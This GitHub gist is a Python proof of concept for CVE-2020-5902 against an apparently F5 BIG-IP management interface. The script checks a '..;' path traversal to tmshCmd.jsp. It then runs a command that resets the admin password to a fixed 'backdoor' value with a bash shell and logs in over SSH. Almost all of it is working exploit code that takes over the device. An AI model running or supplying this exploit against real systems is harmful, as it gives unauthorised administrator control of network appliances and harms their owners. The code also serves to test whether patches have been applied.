Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
| #!/usr/bin/env python3 | |
| import os | |
| import requests | |
| import urllib.parse | |
| target='<ip of target>' | |
| base_url=f'https://{target}/' | |
| password='B@ckd00r!' | |
| def check(base_url): | |
| r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp', verify=False) | |
| return r.status_code == 200 | |
| def change_admin_password(base_url, password): | |
| command=urllib.parse.quote(f'modify auth user admin password {password} shell bash') | |
| r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}', verify=False) | |
| print(r.text) | |
| if check(base_url): | |
| change_admin_password(base_url, password) | |
| print(f'Login with password: {password}') | |
| os.system(f'ssh admin@{target}') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment